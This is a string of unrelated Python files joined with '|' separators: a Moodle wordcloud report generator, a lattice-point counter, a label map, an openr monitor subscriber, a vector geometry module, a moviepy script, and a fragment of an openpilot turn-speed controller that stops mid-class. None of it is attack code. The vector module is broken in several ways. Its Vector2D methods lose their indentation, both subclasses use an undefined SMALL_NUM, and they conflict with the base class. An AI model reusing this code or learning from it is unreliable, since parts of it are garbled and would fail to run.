    # original local `wordcloud`, which shadowed the imported module.)
    cloud = WordCloud(
        font_path='Fonts/Raleway-Bold.ttf',
        stopwords=stopwords,
        background_color='white',
        width=1800,
        height=1400
    ).generate(answertext)
    plt.imshow(cloud)
    plt.axis('off')
    plt.savefig(wc_filename, dpi=300)
    # Word frequencies, ignoring stop words.
    c = Counter([i for i in answertext.lower().split() if i not in stopwords])
    if include_word_count:
        table = '''<table>
<caption>Most common words</caption>
<tr><th>Word</th><th>Count</th></tr>
'''
        for (w, n) in c.most_common(20):
            table += '<tr><td>{w}</td><td>{n}</td></tr>\n'.format(w=w, n=n)
        table += '''</table>'''
        html = html.replace(wordcount_token, table)
    html += '''
</body>
</html>
'''
    with open(html_filename, 'w') as f:
        f.write(html)
    weasyHTML(html_filename).write_pdf(pdf_filename)
    if removeintermediate:
        # BUG FIX: the original printed that it would delete the
        # intermediates but never did; honor the promise.
        os.remove(html_filename)
        os.remove(wc_filename)
if __name__ == '__main__':
    cli = argparse.ArgumentParser()
    cli.add_argument('xlfilename', help='Name of the excel file to use')
    cli.add_argument('-V', '--verbose', help='Be extra verbose', action='store_true', default=False)
    cli.add_argument('-W', '--include-word-count', help='Include a table with the word count', action='store_true', default=False)
    cli.add_argument('-s', '--stop-words', nargs='+', type=str, help='Extra stop words, i.e. words NOT to include in the wordcloud and word count. E.g. -s class course lab')
    cli.add_argument('-o', '--order', default='forward', choices=['forward', 'reverse', 'random'], help='Order in which to return the student answers')
    cli.add_argument('-c', '--collate', default='bystudent', choices=['bystudent', 'byquestion'], help="Organize the answers by student (old style) or by question (new style)")
    opts = cli.parse_args()

    # The pipeline only understands Moodle's .xlsx export format.
    if not opts.xlfilename.endswith('xlsx'):
        sys.exit('You must specify a .xlsx file, likely downloaded from Moodle')

    # Merge user-supplied stop words into the wordcloud defaults.
    stop_set = wordcloud.STOPWORDS
    if opts.stop_words is not None:
        stop_set = stop_set.union(opts.stop_words)

    if opts.order != 'forward':
        sys.exit('Random and reverse order have not been fully tested. I think they may break with the student names, and with the by-question ordering.')

    generatepdf(xl_filename=opts.xlfilename, verbose=opts.verbose,
                include_word_count=opts.include_word_count, order=opts.order,
                stopwords=stop_set, css=css, collate=opts.collate)
|
def solution(r):
    """Count lattice points (i, j) with 1 <= i, j < r inside a circle of
    radius r centred at the origin, then multiply by 4 for all quadrants."""
    quarter = sum(
        1
        for i in range(1, r)
        for j in range(1, r)
        if i * i + j * j <= r * r
    )
    return quarter * 4
def main():
    """Read a radius from stdin and print the lattice-point count."""
    radius = int(input())
    print(solution(radius))


if __name__ == '__main__':
    main()
|
# Mapping from class name to the numeric label used by the model.
label_to_num = {
    'normal': 0,
    'tuberculosis': 1,
}

# Inverse lookup: numeric label back to its class name.
num_to_label = {num: name for name, num in label_to_num.items()}
|
#!/usr/bin/env python3
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from builtins import object
from fbzmq.Monitor import ttypes as monitor_types
from openr.utils import socket, consts
import zmq
class MonitorSubscriber(object):
    """SUB-socket client that streams MonitorPub events from a monitor publisher."""

    def __init__(self, zmq_ctx, monitor_pub_url, timeout=-1,
                 proto_factory=consts.Consts.PROTO_FACTORY):
        """Connect a ZMQ SUB socket to the monitor's PUB endpoint.

        :param zmq_ctx: ZMQ context used to create the socket.
        :param monitor_pub_url: URL of the monitor publisher to connect to.
        :param timeout: receive timeout for the socket; -1 blocks forever.
        :param proto_factory: thrift protocol factory used to deserialize
            received objects.
        """
        # timeout set as -1 for indefinite blocking
        self._monitor_sub_socket = socket.Socket(zmq_ctx, zmq.SUB, timeout,
                                                 proto_factory)
        self._monitor_sub_socket.connect(monitor_pub_url)
        # Empty prefix -> subscribe to every published message.
        self._monitor_sub_socket.set_sock_opt(zmq.SUBSCRIBE, b"")

    def listen(self):
        """Block until the next message arrives; return it as a MonitorPub."""
        return self._monitor_sub_socket.recv_thrift_obj(
            monitor_types.MonitorPub)
|
# -*- coding: utf-8 -*-
import collections.abc
import itertools
import math
# Absolute tolerance passed to math.isclose for every float comparison in
# this module (equality, collinearity, perpendicularity tests).
ABS_TOL = 1e-7 # default value for math.isclose
class Vector(collections.abc.Sequence):
    """A vector, as described by xy or xyz coordinates.

    A Vector is an immutable sequence: iterating over it yields its
    coordinates, and indexing returns the coordinate at that index
    (0=x, 1=y, 2=z).

    :param coordinates: Argument list of two (xy) or three (xyz) coordinates.
        Coordinates should be of type int, float or similar numeric. These
        values are converted to floats.
    :raises ValueError: If fewer than 2 or more than 3 arguments are supplied.

    .. rubric:: Code Example

    .. code-block:: python

        >>> v = Vector(1,2)
        >>> print(v)
        Vector(1.0,2.0)

    .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Basic-Definitions>`_
    """

    def __add__(self, vector):
        """Addition of this vector and a supplied vector.

        :param vector: A vector of the same length as this one.
        :type vector: Vector
        :raises ValueError: If the vectors are not of the same length.
        :rtype: Vector

        .. code-block:: python

            >>> result = Vector(1,2) + Vector(1,1)
            >>> print(result)
            Vector(2.0,3.0)

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Addition>`_
        """
        zipped = itertools.zip_longest(self, vector)  # missing values filled with None
        try:
            coordinates = [a + b for a, b in zipped]
        except TypeError:  # occurs if, say, a or b is None
            raise ValueError('Vectors to add must be of the same length.')
        return Vector(*coordinates)

    def __eq__(self, vector):
        """Tests if this vector and the supplied vector have the same coordinates.

        A tolerance (ABS_TOL) is used so coordinates with a very small
        difference are considered equal.

        :param vector: The vector to be compared.
        :type vector: Vector
        :raises ValueError: If the vectors are not of the same length.
        :return: True if the coordinates are the same, otherwise False.
        :rtype: bool

        .. code-block:: python

            >>> Vector(1,2) == Vector(2,2)
            False
        """
        zipped = itertools.zip_longest(self, vector)  # missing values filled with None
        try:
            result = [math.isclose(a, b, abs_tol=ABS_TOL) for a, b in zipped]
        except TypeError:  # occurs if, say, a or b is None
            # BUG FIX: the message said 'Points' -- this compares Vectors.
            raise ValueError('Vectors to compare must be of the same length.')
        return all(result)

    def __getitem__(self, index):
        "Return the coordinate at *index* (0=x, 1=y, 2=z)."
        return self._coordinates[index]

    def __init__(self, *coordinates):
        "Store two or three numeric coordinates as a tuple of floats."
        if len(coordinates) == 2 or len(coordinates) == 3:
            self._coordinates = tuple(float(c) for c in coordinates)
        else:
            raise ValueError('Vector coordinates must have a length of 2 or 3')

    def __len__(self):
        "Return the number of coordinates (2 or 3)."
        return len(self._coordinates)

    def __mul__(self, scalar):
        """Multiplication of this vector and a supplied scalar value.

        :param scalar: A numerical scalar value.
        :type scalar: float
        :rtype: Vector

        .. code-block:: python

            >>> result = Vector(1,2) * 2
            >>> print(result)
            Vector(2.0,4.0)

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Scalar-Multiplication>`_
        """
        return Vector(*(c * scalar for c in self))

    def __repr__(self):
        "Return 'Vector(x,y[,z])' built from the stored coordinates."
        # BUG FIX: the original read ``self.coordinates``, an attribute this
        # class never defines -> AttributeError on any repr/print.
        return 'Vector(%s)' % ','.join([str(c) for c in self._coordinates])

    def __sub__(self, vector):
        """Subtraction of this vector and a supplied vector.

        :param vector: A vector of the same length as this one.
        :type vector: Vector
        :raises ValueError: If the vectors are not of the same length.
        :rtype: Vector

        .. code-block:: python

            >>> result = Vector(1,2) - Vector(1,1)
            >>> print(result)
            Vector(0.0,1.0)
        """
        zipped = itertools.zip_longest(self, vector)  # missing values filled with None
        try:
            coordinates = [a - b for a, b in zipped]
        except TypeError:  # occurs if, say, a or b is None
            raise ValueError('Vectors to subtract must be of the same length.')
        return Vector(*coordinates)

    def cross_product(self, vector):
        """Returns the 3D cross product of this vector and the supplied vector.

        :param vector: A 3D vector.
        :type vector: Vector
        :return: A new vector perpendicular to this vector (self) and the
            supplied vector, with direction given by the right hand rule.
            If self and the supplied vector are collinear, the returned
            vector is (0,0,0).
        :rtype: Vector

        .. code-block:: python

            >>> result = Vector(1,0,0).cross_product(Vector(0,1,0))
            >>> print(result)
            Vector(0.0,0.0,1.0)

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Cross-Product>`_
        """
        (v1, v2, v3), (w1, w2, w3) = list(self), list(vector)
        return Vector(v2 * w3 - v3 * w2,
                      v3 * w1 - v1 * w3,
                      v1 * w2 - v2 * w1)

    def dot(self, vector):
        """Return the dot product of this vector and the supplied vector.

        :param vector: A vector of the same length as this one.
        :type vector: Vector
        :raises ValueError: If the vectors are not of the same length.
        :returns: The dot product of the two vectors:
            0 if self and vector are perpendicular;
            >0 if the angle between them is acute (<90deg);
            <0 if the angle between them is obtuse (>90deg).
        :rtype: float

        .. code-block:: python

            >>> Vector(1,0).dot(Vector(0,1))
            0.0

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#Dot-Product>`_
        """
        zipped = itertools.zip_longest(self, vector)  # missing values filled with None
        try:
            return sum(a * b for a, b in zipped)
        except TypeError:  # occurs if, say, a or b is None
            # BUG FIX: the message said 'to subtract' (copy-paste from __sub__).
            raise ValueError('Vectors for a dot product must be of the same length.')

    @property
    def index_largest_absolute_coordinate(self):
        """Returns the index of the largest absolute coordinate of the vector.

        :return: 0 if the x-coordinate has the largest absolute value,
            1 if the y-coordinate has the largest absolute value, or
            (for 3D vectors) 2 if the z-coordinate has the largest
            absolute value. (The original docstring claimed 1-based
            indices; the returned index is 0-based, as the examples show.)
        :rtype: int

        .. code-block:: python

            # 2D example
            >>> Vector(1,2).index_largest_absolute_coordinate
            1
            # 3D example
            >>> Vector(1,2,3).index_largest_absolute_coordinate
            2
        """
        absolute_coords = [abs(c) for c in self]
        return absolute_coords.index(max(absolute_coords))

    def is_codirectional(self, vector):
        """Tests if this vector and the supplied vector are codirectional.

        :param vector: A vector.
        :type vector: Vector
        :return: True if the vectors point in the exact same direction;
            otherwise False.
        :rtype: bool

        .. code-block:: python

            >>> Vector(1,2).is_codirectional(Vector(2,4))
            True
            >>> Vector(1,1,1).is_codirectional(Vector(1,0,0))
            False
        """
        return self.is_collinear(vector) and self.dot(vector) > 0

    def is_collinear(self, vector):
        """Tests if this vector and the supplied vector are collinear.

        :param vector: A vector.
        :type vector: Vector
        :raise ValueError: If the vector is not 2D or 3D.
        :return: True if the vectors lie on the same line; otherwise False.
        :rtype: bool

        .. code-block:: python

            >>> Vector(1,0).is_collinear(Vector(2,0))
            True
            >>> Vector(1,0,0).is_collinear(Vector(2,0,0))
            True
        """
        if len(self) == 2:
            # Zero perp product <=> parallel in 2D.
            return math.isclose(self.perp_product(vector), 0, abs_tol=ABS_TOL)
        elif len(self) == 3:
            # Zero-length cross product <=> parallel in 3D.
            return math.isclose(self.cross_product(vector).length, 0, abs_tol=ABS_TOL)
        else:
            raise ValueError('"is_collinear" method requires a 2D or 3D vector.')

    def is_opposite(self, vector):
        """Test if this vector and the supplied vector are opposites.

        :param vector: A vector.
        :type vector: Vector
        :return: True if the vectors point in exact opposite directions;
            otherwise False.
        :rtype: bool

        .. code-block:: python

            >>> Vector(1,2).is_opposite(Vector(-2,-4))
            True
            >>> Vector(1,2,3).is_opposite(Vector(-1,-2,-3))
            True
        """
        return self.is_collinear(vector) and self.dot(vector) < 0

    def is_perpendicular(self, vector):
        """Test if this vector and the supplied vector are perpendicular.

        :param vector: A vector.
        :type vector: Vector
        :return: True if the vectors are perpendicular; otherwise False.
        :rtype: bool

        .. code-block:: python

            >>> Vector(1,0).is_perpendicular(Vector(0,1))
            True
            >>> Vector(1,0,0).is_perpendicular(Vector(0,1,0))
            True
        """
        return math.isclose(self.dot(vector), 0, abs_tol=ABS_TOL)

    @property
    def length(self):
        """Returns the length of the vector.

        :rtype: float

        .. code-block:: python

            >>> Vector(1,0).length
            1.0

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
        """
        return sum(c ** 2 for c in self) ** 0.5

    @property
    def normalise(self):
        """Returns the normalised vector of this vector.

        :returns: A codirectional vector of length 1.
        :raises ZeroDivisionError: If this vector has zero length.
        :rtype: Vector

        .. code-block:: python

            >>> print(Vector(3,0).normalise)
            Vector(1.0,0.0)

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
        """
        l = self.length
        return Vector(*(c / l for c in self))

    @property
    def opposite(self):
        """Returns the opposite vector of this vector.

        :return: A collinear vector which points in the opposite direction.
        :rtype: Vector

        .. code-block:: python

            >>> print(Vector(1,2).opposite)
            Vector(-1.0,-2.0)
            >>> print(Vector(1,2,3).opposite)
            Vector(-1.0,-2.0,-3.0)
        """
        return self * -1

    def perp_product(self, vector):
        """Returns the perp product of this vector and the supplied vector.

        The perp product is the dot product of this vector's perp_vector
        and the supplied vector.

        :param vector: A 2D vector.
        :type vector: Vector
        :raises ValueError: If this vector is not a 2D vector.
        :return: 0 if the supplied vector is collinear with self;
            >0 if it is on the left of self (counterclockwise);
            <0 if it is on the right of self (clockwise).
        :rtype: float

        .. code-block:: python

            >>> Vector(1,0).perp_product(Vector(1,0))
            0.0

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Product>`_
        """
        if len(self) == 2:
            return self.perp_vector.dot(vector)
        else:
            raise ValueError('"perp_product" method only applicable for a 2D vector.')

    @property
    def perp_vector(self):
        """Returns the perp vector of this 2D vector.

        :raises ValueError: If this vector is not a 2D vector.
        :return: The perp vector, i.e. the normal vector on the left
            (counterclockwise) side of self.
        :rtype: Vector

        .. code-block:: python

            >>> print(Vector(1,2).perp_vector)
            Vector(-2.0,1.0)

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Operator>`_
        """
        if len(self) == 2:
            return Vector(-self.y, self.x)
        else:
            raise ValueError('"perp_vector" method only applicable for a 2D vector.')

    def triple_product(self, vector1, vector2):
        """Returns the triple product of this vector and 2 supplied vectors.

        :param vector1: A 3D vector.
        :type vector1: Vector
        :param vector2: A 3D vector.
        :type vector2: Vector
        :return: The triple product of the three vectors, equal to the
            (signed) volume of the parallelepiped they span, i.e. six times
            the volume of the corresponding tetrahedron.
        :rtype: float

        .. code-block:: python

            >>> Vector(1,0,0).triple_product(Vector(0,1,0), Vector(0,0,1))
            1.0

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Triple-Product>`_
        """
        return self.dot(vector1.cross_product(vector2))

    @property
    def x(self):
        """The x coordinate of the vector.

        :rtype: float
        """
        return self[0]

    @property
    def y(self):
        """The y coordinate of the vector.

        :rtype: float
        """
        return self[1]

    @property
    def z(self):
        """The z coordinate of the vector.

        :raises IndexError: If vector is a 2D vector.
        :rtype: float
        """
        return self[2]
class Vector2D(Vector):
"""A two dimensional vector, situated on an x, y plane.
:param x: The x coordinate of the vector.
:type x: float
:param y: The y coordinate of the vector.
:type y: float
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> print(v)
Vector2D(1,2)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Basic-Definitions>`_
"""
def __init__(self,x,y):
""
self._x=x
self._y=y
def __add__(self,vector):
"""Addition of this vector and a supplied vector.
:param vector: A 2D vector.
:type vector: Vector2D
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v + Vector2D(1,1)
>>> print(result)
Vector2D(2,3)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Addition>`_
"""
return Vector2D(self.x+vector.x,
self.y+vector.y)
def __eq__(self,vector):
"""Tests if this vector and the supplied vector are equal.
:param vector: A 2D vector.
:type vector: Vector2D
:return: True if the vector coordinates are the same; otherwise false
:rtype: bool
:Example:
.. code-block:: python
>>> v1 = Vector2D(1,2)
>>> v2 = Vector2D(2,2)
>>> result = v1 == v2
>>> print(result)
False
"""
return (abs(self.x-vector.x)<SMALL_NUM and
abs(self.y-vector.y)<SMALL_NUM)
def __repr__(self):
""
return 'Vector2D(%s)' % ','.join([str(c) for c in self.coordinates])
def __mul__(self,scalar):
"""Multiplication of this vector and a supplied scalar value.
:param scalar: a numerical scalar value
:type scalar: float
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v1 * 2
>>> print(result)
Vector2D(2,4)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Scalar-Multiplication>`_
"""
return Vector2D(self.x*scalar,
self.y*scalar)
def __sub__(self,vector):
"""Subtraction of this vector and a supplied vector.
:param vector: A 2D vector.
:type vector: Vector2D
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v - Vector2D(1,1)
>>> print(result)
Vector2D(0,1)
"""
return Vector2D(self.x-vector.x,
self.y-vector.y)
@property
def coordinates(self):
"""Returns the coordinates of the vector.
:return: The x and y coordinates as tuple (x,y)
:rtype: tuple
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v.coordinates
>>> print(result)
(1,2)
"""
return self.x, self.y
    @property
    def dimension(self):
        """The dimension of the vector.

        :return: '2D'
        :rtype: str

        :Example:

        .. code-block:: python

           >>> v = Vector2D(2,1)
           >>> print(v.dimension)
           2D
        """
        return '2D'
    def dot(self,vector):
        """Return the dot product of this vector and the supplied vector.

        :param vector: A 2D vector.
        :type vector: Vector2D
        :return: The dot product of the two vectors:
            returns 0 if self and vector are perpendicular;
            returns >0 if the angle between self and vector is an acute angle (i.e. <90deg);
            returns <0 if the angle between self and vector is an obtuse angle (i.e. >90deg).
        :rtype: float

        :Example:

        .. code-block:: python

           >>> v1 = Vector2D(1,0)
           >>> v2 = Vector2D(0,1)
           >>> result = v1.dot(v2)
           >>> print(result)
           0

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#Dot-Product>`_
        """
        return self.x*vector.x+self.y*vector.y
    def is_collinear(self,vector):
        """Tests if this vector and the supplied vector are collinear.

        :param vector: A 2D vector.
        :type vector: Vector2D
        :return: True if the vectors lie on the same line;
            otherwise False.
        :rtype: bool

        :Example:

        .. code-block:: python

           >>> v1 = Vector2D(1,0)
           >>> v2 = Vector2D(2,0)
           >>> result = v1.is_collinear(v2)
           >>> print(result)
           True
        """
        # Collinear vectors have a (near) zero perp product.
        return abs(self.perp_product(vector)) < SMALL_NUM
@property
def length(self):
"""Returns the length of the vector.
:rtype: float
:Example:
.. code-block:: python
>>> v = Vector2D(1,0)
>>> result = v.length
>>> print(result)
1
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
"""
return (self.x**2+self.y**2)**0.5
    @property
    def normalise(self):
        """Returns the normalised vector of this vector.

        :return: A codirectional vector of length 1.
        :rtype: Vector2D
        :raises ZeroDivisionError: if this vector has zero length.

        :Example:

        .. code-block:: python

           >>> v = Vector2D(3,0)
           >>> result = v.normalise
           >>> print(result)
           Vector2D(1.0,0.0)

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
        """
        l=self.length
        return Vector2D(self.x/l,
                        self.y/l)
    def perp_product(self,vector):
        """Returns the perp product of this vector and the supplied vector.

        :param vector: A 2D vector.
        :type vector: Vector2D
        :return: The perp product of the two vectors.
            The perp product is the dot product of
            the perp_vector of this vector and the supplied vector.
            If supplied vector is collinear with self, returns 0.
            If supplied vector is on the left of self, returns >0 (i.e. counterclockwise).
            If supplied vector is on the right of self, returns <0 (i.e. clockwise).
        :rtype: float

        :Example:

        .. code-block:: python

           >>> v1 = Vector2D(1,0)
           >>> v2 = Vector2D(1,0)
           >>> result = v1.perp_product(v2)
           >>> print(result)
           0

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Product>`_
        """
        return self.perp_vector.dot(vector)
@property
def perp_vector(self):
"""Returns the perp vector of this vector.
:return: The perp vector, i.e. the normal vector on the left
(counterclockwise) side of self.
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,0)
>>> result = v.perp_vector
>>> print(result)
Vector2D(0,1)
.. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Operator>`_
"""
return Vector2D(-self.y,self.x)
    @property
    def x(self):
        """The x coordinate of the vector (read-only).

        :rtype: float
        """
        return self._x
    @property
    def y(self):
        """The y coordinate of the vector (read-only).

        :rtype: float
        """
        return self._y
class Vector3D(Vector):
    """A three dimensional vector, situated on an x, y, z plane.

    :param x: The x coordinate of the vector.
    :type x: float
    :param y: The y coordinate of the vector.
    :type y: float
    :param z: The z coordinate of the vector.
    :type z: float

    :Example:

    .. code-block:: python

       >>> v = Vector3D(1,2,3)
       >>> print(v)
       Vector3D(1,2,3)

    .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Basic-Definitions>`_
    """
    def __init__(self,x=0,y=0,z=0):
        """Store the x, y and z coordinates; all default to 0."""
        self._x=x
        self._y=y
        self._z=z
    def __add__(self,vector):
        """Addition of this vector and a supplied vector.

        :param vector: A 3D vector.
        :type vector: Vector3D
        :rtype: Vector3D

        :Example:

        .. code-block:: python

           >>> v = Vector3D(1,2,3)
           >>> result = v + Vector3D(1,1,1)
           >>> print(result)
           Vector3D(2,3,4)
        """
        return Vector3D(self.x+vector.x,
                        self.y+vector.y,
                        self.z+vector.z)
    def __eq__(self,vector):
        """Tests if this vector and the supplied vector are equal.

        :param vector: A 3D vector.
        :type vector: Vector3D
        :return: True if the vector coordinates are the same; otherwise false

        :rtype: bool

        :Example:

        .. code-block:: python

           >>> v1 = Vector3D(1,2,3)
           >>> v2 = Vector3D(2,2,3)
           >>> result = v1 == v2
           >>> print(result)
           False
        """
        # NOTE: defining __eq__ without __hash__ makes instances unhashable.
        if isinstance(vector,Vector3D):
            return (abs(self.x-vector.x)<SMALL_NUM
                    and abs(self.y-vector.y)<SMALL_NUM
                    and abs(self.z-vector.z)<SMALL_NUM)
        else:
            return False
    def __repr__(self):
        """Return an unambiguous string form, e.g. ``Vector3D(1,2,3)``."""
        return 'Vector3D(%s)' % ','.join([str(c) for c in self.coordinates])
    def __mul__(self,scalar):
        """Multiplication of this vector and a supplied scalar value.

        :param scalar: a numerical scalar value
        :type scalar: float
        :raises TypeError: if scalar is not an int or a float.
        :rtype: Vector3D

        :Example:

        .. code-block:: python

           >>> v = Vector3D(1,2,3)
           >>> result = v * 2
           >>> print(result)
           Vector3D(2,4,6)

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Scalar-Multiplication>`_
        """
        if isinstance(scalar,int) or isinstance(scalar,float):
            return Vector3D(self.x*scalar,
                            self.y*scalar,
                            self.z*scalar)
        else:
            raise TypeError
    def __sub__(self,vector):
        """Subtraction of this vector and a supplied vector.

        :param vector: A 3D vector.
        :type vector: Vector3D
        :rtype: Vector3D

        :Example:

        .. code-block:: python

           >>> v = Vector3D(1,2,3)
           >>> result = v - Vector3D(1,1,1)
           >>> print(result)
           Vector3D(0,1,2)
        """
        return Vector3D(self.x-vector.x,
                        self.y-vector.y,
                        self.z-vector.z)
    def cross_product(self,vector):
        """Returns the 3D cross product of this vector and the supplied vector.

        :param vector: A 3D vector.
        :type vector: Vector3D
        :return: The 3D cross product of the two vectors.
            This returns a new vector which is perpendicular to
            this vector (self) and the supplied vector.
            The returned vector has direction according to the right hand rule.
            If this vector (self) and the supplied vector are collinear,
            then the returned vector is (0,0,0)
        :rtype: Vector3D

        :Example:

        .. code-block:: python

           >>> v1 = Vector3D(1,0,0)
           >>> v2 = Vector3D(0,1,0)
           >>> result = v1.cross_product(v2)
           >>> print(result)
           Vector3D(0,0,1)

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Cross-Product>`_
        """
        (v1,v2,v3),(w1,w2,w3)=self.coordinates,vector.coordinates
        return Vector3D(v2*w3-v3*w2,
                        v3*w1-v1*w3,
                        v1*w2-v2*w1)
    @property
    def coordinates(self):
        """Returns the coordinates of the vector.

        :return: The x, y and z coordinates as tuple (x,y,z)
        :rtype: tuple

        :Example:

        .. code-block:: python

           >>> v = Vector3D(1,2,3)
           >>> result = v.coordinates
           >>> print(result)
           (1, 2, 3)
        """
        return self.x, self.y, self.z
    @property
    def dimension(self):
        """The dimension of the vector.

        :return: '3D'
        :rtype: str

        :Example:

        .. code-block:: python

           >>> v = Vector3D(1,2,3)
           >>> print(v.dimension)
           3D
        """
        return '3D'
    def dot(self,vector):
        """Return the dot product of this vector and the supplied vector.

        :param vector: A 3D vector.
        :type vector: Vector3D
        :return: The dot product of the two vectors:
            returns 0 if self and vector are perpendicular;
            returns >0 if the angle between self and vector is an acute angle (i.e. <90deg);
            returns <0 if the angle between self and vector is an obtuse angle (i.e. >90deg).
        :rtype: float

        :Example:

        .. code-block:: python

           >>> v1 = Vector3D(1,0,0)
           >>> v2 = Vector3D(0,1,0)
           >>> result = v1.dot(v2)
           >>> print(result)
           0

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#Dot-Product>`_
        """
        return self.x*vector.x + self.y*vector.y + self.z*vector.z
    def is_collinear(self,vector):
        """Tests if this vector and the supplied vector are collinear.

        :param vector: A 3D vector.
        :type vector: Vector3D
        :return: True if the vectors lie on the same line;
            otherwise False.
        :rtype: bool

        :Example:

        .. code-block:: python

           >>> v1 = Vector3D(1,0,0)
           >>> v2 = Vector3D(2,0,0)
           >>> result = v1.is_collinear(v2)
           >>> print(result)
           True
        """
        # Collinear vectors have a (near) zero-length cross product.
        return self.cross_product(vector).length < SMALL_NUM
    @property
    def length(self):
        """Returns the length of the vector.

        :rtype: float

        :Example:

        .. code-block:: python

           >>> v = Vector3D(1,0,0)
           >>> result = v.length
           >>> print(result)
           1.0

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
        """
        return (self.x**2 + self.y**2 + self.z**2)**0.5
    @property
    def normalise(self):
        """Returns the normalised vector of this vector.

        :return: A codirectional vector of length 1.
        :rtype: Vector3D
        :raises ZeroDivisionError: if this vector has zero length.

        :Example:

        .. code-block:: python

           >>> v = Vector3D(3,0,0)
           >>> result = v.normalise
           >>> print(result)
           Vector3D(1.0,0.0,0.0)

        .. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
        """
        l=self.length
        return Vector3D(self.x/l,
                        self.y/l,
                        self.z/l)
    def triple_product(self,vector1,vector2):
        """Returns the triple product of this vector and 2 supplied vectors.

        :param vector1: A 3D vector.
        :type vector1: Vector3D
        :param vector2: A 3D vector.
        :type vector2: Vector3D
        :return: The triple product of the three vectors.
            The result is equal to the volume of the parallelepiped (3D equivalent of a parallelogram).
            The result is equal to six times the volume of the tetrahedron (3D shape with 4 vertices).
        :rtype: float

        :Example:

        .. code-block:: python

           >>> v1 = Vector3D(1,0,0)
           >>> v2 = Vector3D(0,1,0)
           >>> v3 = Vector3D(0,0,1)
           >>> result = v1.triple_product(v2,v3)
           >>> print(result)
           1

        .. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Triple-Product>`_
        """
        return self.dot(vector1.cross_product(vector2))
    @property
    def x(self):
        """The x coordinate of the vector (read-only).

        :rtype: float
        """
        return self._x
    @property
    def y(self):
        """The y coordinate of the vector (read-only).

        :rtype: float
        """
        return self._y
    @property
    def z(self):
        """The z coordinate of the vector (read-only).

        :rtype: float
        """
        return self._z
|
import glob
from moviepy.editor import *

# Collect the generated interpolation frames and assemble them into a
# 30 fps video clip.
frame_paths = sorted(glob.glob(r'/home/z1143165/video-GAN/output_networks/jelito3d_batchsize8/jelito3d_batchsize8_s8_i200000_interpolations/?_?/*'))
print('generating')
for frame_path in frame_paths:
    print(frame_path)
clip = ImageSequenceClip(frame_paths, fps=30)
print(clip.duration)
print('saving')
clip.write_videofile("0-1-2-3.mp4", fps=30, audio=False)
|
import numpy as np
import time
from common.params import Params
from cereal import log
from common.realtime import sec_since_boot
from selfdrive.controls.lib.speed_smoother import speed_smoother
# Tuning constants for map-data-based turn speed limit control.
_LON_MPC_STEP = 0.2  # Time step of longitudinal control (5 Hz)
_MIN_ADAPTING_BRAKE_ACC = -1.5  # Minimum acceleration allowed when adapting to lower speed limit.
_MIN_ADAPTING_BRAKE_JERK = -1.0  # Minimum jerk allowed when adapting to lower speed limit.
_SPEED_OFFSET_TH = -3.0  # m/s Maximum offset between speed limit and current speed for adapting state.
_LIMIT_ADAPT_ACC = -1.0  # Ideal acceleration for the adapting (braking) phase when approaching speed limits.
_MIN_SPEED_LIMIT = 8.33  # m/s (~30 km/h), Minimum speed limit to provide as solution.
_MAX_MAP_DATA_AGE = 10.0  # s Maximum time to hold to map data, then consider it invalid.
_DEBUG = False  # Set True to print state-transition and map-data diagnostics.
# NOTE(review): reuses the SpeedLimitControlState enum for turn speed control;
# the shared state names (inactive/adapting/active/...) appear intentional.
TurnSpeedControlState = log.ControlsState.SpeedLimitControlState
def _debug(msg):
    """Print *msg* only when the module-level _DEBUG flag is set."""
    if _DEBUG:
        print(msg)
def _description_for_state(turn_speed_control_state):
    """Return a human-readable name for a TurnSpeedControlState value.

    Returns None for any state not listed (matching the original
    fall-through behaviour).
    """
    names = {
        TurnSpeedControlState.inactive: 'INACTIVE',
        TurnSpeedControlState.adapting: 'ADAPTING',
        TurnSpeedControlState.active: 'ACTIVE',
    }
    return names.get(turn_speed_control_state)
class TurnSpeedController():
    """Longitudinal speed controller for map-based turn speed limits.

    Consumes turn speed limits from the `liveMapData` socket and produces a
    speed/acceleration solution (``v_turn_limit``, ``a_turn_limit``,
    ``v_turn_limit_future``) for the planner, transitioning between the
    inactive, adapting (braking towards a lower limit) and active (tracking
    the limit) states.
    """
    def __init__(self):
        self._params = Params()
        self._last_params_update = 0.0
        self._is_enabled = self._params.get("TurnSpeedControl", encoding='utf8') == "1"
        self._op_enabled = False  # openpilot enabled flag, refreshed on every update().
        self._active_jerk_limits = [0.0, 0.0]
